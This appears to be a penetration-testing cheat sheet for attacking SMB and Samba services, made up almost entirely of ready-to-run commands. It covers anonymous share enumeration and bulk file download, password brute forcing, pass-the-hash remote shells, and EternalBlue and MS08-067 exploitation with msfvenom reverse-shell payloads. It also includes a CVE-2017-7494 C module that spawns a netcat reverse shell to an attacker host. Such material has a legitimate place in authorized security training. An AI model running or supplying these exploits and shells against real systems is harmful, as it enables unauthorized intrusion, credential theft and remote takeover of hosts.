Version if nmap didnβt detect it
Copy Sometimes nmap doesnβt show the version of Samba in the remote host, if this happens, a good way to know which version the remote host is running, is to capture traffic with wireshark against the remote host on 445/139 and in parallel run an smbclient -L, do a follow tcp stream and with this we might see which version the server is running.
OR
sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139
smbclient -L <IP> Scan for vulnerability
Copy nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP> If :
Manual testing
Copy smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R
crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares
enum4linux -a <IP>
smbclient --no-pass -L //$IP
smbclient //<IP>/<SHARE>
# Download all files from a directory recursively
smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *" Brute force
Copy crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV Mount a SMB share
Copy mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>'//<IP>/<SHARE> /tmp/share
smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER> Get a shell
Copy psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>
atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH> EternalBlue (MS17-010)
Copy https://github.com/3ndG4me/AutoBlue-MS17-010 Check if vulnerable
Copy python eternal_checker.py <IP> Prepare shellcodes and listeners
Copy cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh Exploit
Copy python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin
May need to run it multiple times If this doesnβt work, try this one
Copy python zzz_exploit.py <IP> MS08-067
Copy # Download exploit code
git clone https://github.com/andyacer/ms08_067.git
# Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
# Modify
Modify ms08_067_2018.py and replace the shellcode variable by the one generated with msfvenom.
# Listener
nc -lvp <PORT>
# Exploit
python ms08_067_2018.py <IP> <NUMBER> 445 CVE-2017-7494
Copy # Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494 Create a new file named poc.c :
Copy #include <stdio.h>
#include <stdlib.h>
int samba_init_module(void)
{
setresuid(0,0,0);
system("ping -c 3 <IP>");
}
Copy # Build
gcc -o test.so -shared poc.c -fPIC
Copy # Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp
# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so If you reiceve 3 pings on your listener then the exploit works. Now letβs get a shell :
Copy #include <stdio.h>
#include <stdlib.h>
int samba_init_module(void)
{
setresuid(0,0,0);
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
}
Copy # Build
gcc -o test.so -shared poc.c -fPIC
Copy # Start a listener
nc -lvp <PORT>
# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so nmap
Copy root@kali:~# nmap -v -p 139,445 --script smb-vuln-* 192.168.56.101 nbtscan
Copy root@kali nbtscan -r 192.168.11.0/24 enum4linux
Copy root@kali:~# enum4linux -a 192.168.56.101 smbmap
Copy smbmap -H 10.10.10.161
ADMIN$
C$
Data
Copy smbmap -H 10.10.10.16 -R DATA #recursive search
smbmap -H 10.10.10.16 -R DATA --download 'Data\\Search\\archivo.txt' with credentials
Copy smbmap -u Tempuser -p Welcome123 -H 10.10.10.16 -R DATA enumerating
Copy smbmap -d active.htb -u SVC_TGS -p GPPsaras2012 -H 10.10.10.100 smbclient
Copy smbclient \\\\$ip\\$share -I target -N
smbclient -N -L 192.168.168.168 - lists smb type (often displaying samba version) and various shares mount
Copy smbclient \\\\secnotes.htb\\new-site -U anonymous
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget * rpcclient
Copy rpcclient -U "" target Mount shares
Copy mount -t cifs -o user=USERNAME,sec=ntlm,dir_mode=0077 "//10.10.10.10/My Share" /mnt/cifs mount shares 2
Copy sudo apt-get install cifs-utils
mkdir /mnt/Replication
mount -t cifs //10.10.10.100/Replication /mnt/Replication -o
username=<username>,password=<password>,domain=active.htb
grep -R password /mnt/Replication/ nmblookup
nmblookup is used to query NetBIOS names and map them to IP addresses in a network using NetBIOS over TCP/IP queries
accesschk
Copy accesschk -v -t (target IP) -u user -P /usr/share/dirb/wordlists/common.txt - attempts to connect to $IPC or $ADMIN shares shell when we have the credentials
Copy root@kali:# psexec.py secnotes/administrator:@secnotes.htb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password: shell 2 when i have credentials
Copy winexe -U Administrator //10.0.0.0 "cmd.exe" If SMB is up locally but the port is closed externally, then try a remote port forward back to your attacking machine:
Copy plink.exe -l sshproxy -pw sshproxy -R 445:127.0.0.1:445 10.10.10.10
winexe -U Administrator //127.0.0.1 "cmd.exe" Last updated 10 months ago